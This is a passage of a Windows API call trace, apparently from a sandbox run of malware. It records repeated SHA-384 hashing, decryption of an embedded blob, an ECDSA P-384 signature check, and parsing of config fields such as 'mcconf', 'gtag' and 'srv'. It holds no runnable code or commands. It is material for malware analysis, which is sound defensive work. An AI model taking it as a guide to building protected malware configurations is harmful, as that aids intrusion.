	[0201.852] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca370, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca370, pdwDataLen=0x129424) returned 1
	[0201.852] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.852] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.852] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.852] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.852] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0201.852] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.852] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca398
	[0201.852] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca398, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca398, pdwDataLen=0x129424) returned 1
	[0201.852] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.853] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.853] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.853] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.853] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0201.853] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.853] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ca3c0
	[0201.853] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca3c0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca3c0, pdwDataLen=0x129424) returned 1
	[0201.853] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.853] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.853] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.853] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.853] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0201.853] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.854] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca3e8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca3e8, pdwDataLen=0x129424) returned 1
	[0201.854] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.854] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.854] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.854] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.854] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0201.854] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.854] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca410, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca410, pdwDataLen=0x129424) returned 1
	[0201.854] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.854] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.854] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.855] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.855] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0201.855] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.855] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca438, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca438, pdwDataLen=0x129424) returned 1
	[0201.855] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.855] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.855] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.855] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.855] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0201.855] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.855] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca460, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca460, pdwDataLen=0x129424) returned 1
	[0201.855] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.855] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.855] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.856] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.856] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0201.856] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.856] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca488, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca488, pdwDataLen=0x129424) returned 1
	[0201.856] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.856] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.856] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.856] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.856] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0201.856] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.856] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca4b0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca4b0, pdwDataLen=0x129424) returned 1
	[0201.856] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.856] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.856] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.857] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.857] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0201.857] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.857] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca4d8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca4d8, pdwDataLen=0x129424) returned 1
	[0201.857] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.857] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.857] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.857] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.857] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0201.857] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.857] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca500, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca500, pdwDataLen=0x129424) returned 1
	[0201.857] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.857] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.857] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.858] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.858] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0201.858] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.858] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca528, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca528, pdwDataLen=0x129424) returned 1
	[0201.858] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.858] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.858] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.858] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.858] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0201.858] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.858] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca550, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca550, pdwDataLen=0x129424) returned 1
	[0201.858] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.858] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.858] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.859] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.859] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0201.859] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.859] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca578, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca578, pdwDataLen=0x129424) returned 1
	[0201.859] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.859] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.859] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.859] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.859] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0201.859] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.859] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca5a0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca5a0, pdwDataLen=0x129424) returned 1
	[0201.859] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.859] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.859] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.860] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.860] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0201.860] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.860] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca5c8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca5c8, pdwDataLen=0x129424) returned 1
	[0201.860] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.860] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.860] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.860] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.860] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0201.860] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.860] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca5f0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca5f0, pdwDataLen=0x129424) returned 1
	[0201.860] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.860] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.860] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.861] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.861] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0201.861] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.861] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca618, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca618, pdwDataLen=0x129424) returned 1
	[0201.861] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.861] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.861] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.861] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.861] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0201.861] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.861] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca640, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca640, pdwDataLen=0x129424) returned 1
	[0201.861] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.861] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.861] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.862] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.862] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0201.862] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.862] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca668, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca668, pdwDataLen=0x129424) returned 1
	[0201.862] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.862] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.862] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.862] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.862] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0201.862] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.862] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26ca690, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca690, pdwDataLen=0x129424) returned 1
	[0201.862] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.862] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.862] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.863] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.863] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0201.863] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.863] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26ca6b8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26ca6b8, pdwDataLen=0x129424) returned 1
	[0201.863] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.863] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.864] CryptImportKey (in: hProv=0x2251f8, pbData=0x129418, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x129458 | out: phKey=0x129458*=0x22b6600) returned 1
	[0201.864] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x4, pbData=0x129444*=0x1, dwFlags=0x0) returned 1
	[0201.864] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x1, pbData=0x26ca7d0, dwFlags=0x0) returned 1
	[0201.864] CryptDecrypt (in: hKey=0x22b6600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22eacc8, pdwDataLen=0x12944c | out: pbData=0x22eacc8, pdwDataLen=0x12944c) returned 1
	[0201.864] CryptDestroyKey (hKey=0x22b6600) returned 1
	[0201.864] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.864] GetVersion () returned 0x1db10106
	[0201.864] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x129458, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x129458) returned 0x0
	[0201.865] BCryptImportKeyPair (in: hAlgorithm=0x22ee2a8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x129460, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x129460) returned 0x0
	[0201.867] BCryptGetProperty (in: hObject=0x2299ad0, pszProperty="SignatureLength", pbOutput=0x129478, cbOutput=0x4, pcbResult=0x129450, dwFlags=0x0 | out: pbOutput=0x129478, pcbResult=0x129450) returned 0x0
	[0201.867] BCryptVerifySignature (hKey=0x2299ad0, pPaddingInfo=0x0, pbHash=0x22a6228, cbHash=0x30, pbSignature=0x22eb316, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0201.870] BCryptDestroyKey (in: hKey=0x2299ad0 | out: hKey=0x2299ad0) returned 0x0
	[0201.870] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee2a8, dwFlags=0x0 | out: hAlgorithm=0x22ee2a8) returned 0x0
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6228) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="mcconf", cchLength=0x6 | out: lpsz="mcconf") returned 0x6
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6d8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="ver", cchLength=0x3 | out: lpsz="ver") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6d8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="gtag", cchLength=0x4 | out: lpsz="gtag") returned 0x4
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff690) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="servs", cchLength=0x5 | out: lpsz="servs") returned 0x5
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.870] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
